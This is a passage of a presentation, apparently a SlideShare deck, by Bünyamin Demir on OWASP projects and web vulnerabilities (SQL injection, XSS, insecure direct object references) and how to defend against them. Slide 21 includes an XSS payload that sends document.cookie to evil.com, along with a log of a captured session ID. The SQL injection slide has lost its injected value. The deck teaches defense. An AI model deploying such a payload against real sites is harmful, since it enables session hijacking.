Bünyamin Demir - Secure YourApp
•
2 likes•995 views
This document provides an overview of SecureYourApp and OWASP (Open Web Application Security Project). It introduces Bünyamin Demir, the founder of SecureYourApp and leader of OWASP Turkey. It then discusses various OWASP projects like the OWASP Top 10, ZAP Proxy, and Application Security Verification Standard. Finally, it covers some common web application vulnerabilities like injection, XSS, and insecure direct object references, providing examples and mitigation techniques like input validation.
Report
Share
Bünyamin Demir - Secure YourApp
- 2. Bünyamin Demir ( @bunyamindemir ) – Lisans Kocaeli Üni. Matematik Bölümü – Yüksek Lisans Kocaeli Üni Fen-Bilimleri, Tez; Oracle Veritabanı Güvenliği – Uygulama Geliştirici – OWASP Türkiye Bölüm Lideri – Sızma Testleri Uzmanı • Web, Mobil, Network, SCADA, Wireless, Sosyal Mühendislik, ATM, DoS/DDoS ve Yük testi • Kaynak kod analizi – Eğitmen • Web/Mobil Uygulama Güvenlik Denetimi • Güvenli Kod Geliştirme • Veritabanı Güvenliği 2
- 3. 3 OWASP
- 4. 4 Why is OWASP Special?
- 5. • OWASP Top 10 • OWASP Zed Attack Proxy (ZAP) • OpenSAMM • Cheat Sheets • ESAPI • ASVS • Testing Guide • Development Guide 5 OWASP Projects
- 6. 6 OWASP ZAP Proxy / WebScarab
- 7. 7 Application Security Verification Standart
- 8. Application Security 8 Two weeks of ethical hacking Ten man-years of development Business Logic Flaws Code Flaws Security Errors
- 10. Web Application Threat Surface 10
- 11. 11 OWASP TOP 10
- 13. Anatomy of SQL Injection Attack 13 sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “’ AND password = ‘” & Request (“password”) & ”’” What the developer intended: username = john password = password SQL Query: SELECT * FROM user_table WHERE username = ‘john’ AND password = ‘password’
- 14. Anatomy of SQL Injection Attack 14 sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “ ’ AND password = ‘ ” & Request(“password”) & “ ’ ” (This is DYNAMIC SQL and Untrusted Input) What the developer did not intend is parameter values like: username = john password = SQL Query: SELECT * FROM user_table WHERE username = ‘john’ AND password = causes all rows in the users table to be returned!
- 15. Bind Parameters (PHP) 15 $stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
- 16. Parametrized Query (.NET) 16 SqlConnection objConnection = new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader();
- 17. Prepare Statement (Java) 17 String newName = request.getParameter("newName") ; String id = request.getParameter("id"); //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
- 18. A3 - XSS 18
- 19. A3 - XSS 19
- 20. Anatomy of XSS Attack 20 http://www.davshan.loc/friends.php?search=<abc> <p>Result for <b><abc></b> :0<p><br /> http://www.davshan.loc/friends.php?search=<script>alert(1);</script>
- 21. Anatomy of XSS Attack 21 <script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script> 187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5 HTTP/1.1" 200 7425 "http://www.davshan.loc/....
- 22. OWASP Java Encoder Project 22 <%-- Basic HTML Context --%> <body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body> <%-- HTML Attribute Context --%> <input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" /> <%-- Javascript Block context --%> <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg); </script> <%-- Javascript Variable context --%> <button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>
- 23. Rich Text 23
- 24. OWASP HTML Sanitizer Project 24 PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build(); String safeHTML = policy.sanitize(untrustedHTML);
- 25. JQuery.Encoder 25 … $(function() { $(".div [name="+$.encoder.encodeForHTML($.encoder.canonicalize(window.location.hash.substr(1)+"]")); }); … encodeForHTMLAttribute, encodeForJavascript, encodeForURL, encodeForCSS $('#profile_link').html('<a href="/profile/' + $.encoder.encodeForURL(userID) + '">Link</a>');
- 26. A4 – Insecure Direct Object References 26 • Attacker notices his acct parameter is 6065 ?acct=6065 • He modifies it to a nearby number ?acct=6066 • Attacker views the victim’s account information https://www.onlinebank.com/user?acct=6065
- 27. Best way to SecureYourApp 27 Input Validation
- 28. Input Validation - Java 28 public boolean validateUsername(String username) { String usernamePattern = "^[a-zA-Z0-9]{6,12}$"; if (username == null) { return false; } Pattern p = Pattern.compile(usernamePattern); Matcher m = p.matcher(username); if (!m.matches()) { return false; } return true; } if (!validateUsername(username)) { //invalid username }
- 29. Input Validation - .NET 29 if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.s]{1,10}$")) { // sinif ismi uygun değildir }
- 30. 30